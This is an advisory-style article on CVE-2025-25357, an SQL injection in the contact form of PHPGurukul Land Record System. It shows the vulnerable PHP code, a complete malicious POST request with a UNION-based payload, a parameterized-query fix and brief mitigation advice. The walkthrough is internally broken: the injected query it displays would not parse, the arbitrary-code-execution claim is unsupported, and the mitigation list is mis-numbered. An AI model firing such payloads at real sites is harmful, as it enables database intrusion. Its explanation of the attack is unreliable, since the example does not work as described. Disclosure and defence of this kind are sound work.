Overview
Recently, a critical vulnerability has been discovered in PHPGurukul Land Record System v1., which is widely used software for managing land records and related data. This vulnerability is an instance of SQL Injection and has been assigned the CVE ID CVE-2025-25357. An attacker could potentially exploit this vulnerability to execute arbitrary code, leading to unauthorized access, data leakage or even a compromise of the entire system.
In this article, we will discuss the details of this vulnerability, including a walk-through of example exploits, references to the original sources and advice on how to mitigate the risk.
Vulnerability Details
The vulnerability resides in the /admin/contactus.php file of PHPGurukul Land Record System v1. and affects the email POST request parameter. An attacker can supply crafted data in this parameter to manipulate the SQL query and access sensitive data from the underlying database or execute arbitrary code.
Here is a snippet from the vulnerable code section:
$email = $_POST['email'];
$query = "INSERT INTO contactus(name,email,subject,message) VALUES('$name', '$email','$subject','$message')";
$result = mysqli_query($con, $query);
This code allows user input to be directly passed into an SQL query without any input validation or proper parameterization, making it vulnerable to SQL injection.
1. The attacker sends a malicious POST request, including a specially crafted email value:
POST /admin/contactus.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

email=test@example.com' UNION SELECT 1,2,3,@@version -- -&name=test&subject=test&message=test
2. The SQL query would then look like this:
INSERT INTO contactus(name,email,subject,message) VALUES('test', 'test@example.com' UNION SELECT 1,2,3,@@version -- -','test','test')
3. The attacker has now injected an additional SELECT statement into the query, revealing the database version, which could potentially be leveraged to carry out further exploits.
Here are the original references for further information:
1. Vulnerability Description from NVD
2. PHPGurukul Land Record System Official Website
Mitigation Steps
In order to mitigate and protect against this vulnerability, users should undertake the following actions:
Ensure proper parameterization is used in SQL queries to avoid SQL injection attacks.
4. Keep regular backups of your system and important files to ensure you have a recovery point in case of a compromise.
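The parameterization advice above, applied to the contactus insert as an added example (this is not PHPGurukul's code). It assumes PHP 8 with the pdo_sqlite extension and swaps MySQL for an in-memory SQLite table so it runs without a database server; the function names are hypothetical, and the input is the email value from the request shown earlier.

```php
<?php
declare(strict_types=1);
// Added example, not PHPGurukul code. The in-memory SQLite table stands in
// for the MySQL `contactus` table; all function names are hypothetical.

function open_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE contactus(name TEXT, email TEXT, subject TEXT, message TEXT)');
    return $db;
}

// Parameterized insert: the SQL text is fixed and the values travel
// separately, so quotes in $f['email'] cannot change the statement.
// mysqli equivalent: $con->prepare(...) then $stmt->bind_param('ssss', ...).
function insert_contact(PDO $db, array $f): void
{
    $stmt = $db->prepare(
        'INSERT INTO contactus(name,email,subject,message) VALUES(?,?,?,?)'
    );
    $stmt->execute([$f['name'], $f['email'], $f['subject'], $f['message']]);
}

// Validation as a second layer. It does not replace binding: a single
// quote is legal in an address (o'brien@example.com passes the filter).
function handle_post(PDO $db, array $post): bool
{
    foreach (['name', 'email', 'subject', 'message'] as $k) {
        if (!isset($post[$k]) || !is_string($post[$k])) {
            return false;
        }
    }
    if (filter_var($post['email'], FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    insert_contact($db, $post);
    return true;
}

// Constructed input: the email value from the request shown above.
$payload = [
    'name' => 'test', 'subject' => 'test', 'message' => 'test',
    'email' => "test@example.com' UNION SELECT 1,2,3,@@version -- -",
];
$db = open_demo_db();
var_dump(handle_post($db, $payload));   // validation result for the payload
insert_contact($db, $payload);          // binding alone, validation skipped
$rows = $db->query('SELECT email FROM contactus')->fetchAll(PDO::FETCH_COLUMN);
var_dump($rows === [$payload['email']]); // stored as one literal string?
```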
Conclusion
CVE-2025-25357 exposes a dangerous flaw in the PHPGurukul Land Record System v1., which could result in severe consequences if left unaddressed. It is crucial for users to be vigilant when dealing with user-supplied data and to incorporate best practices when it comes to secure coding and design to minimize the risk of vulnerabilities.
Timeline
Published on: 02/13/2025 16:16:49 UTC
Last modified on: 02/14/2025 19:38:15 UTC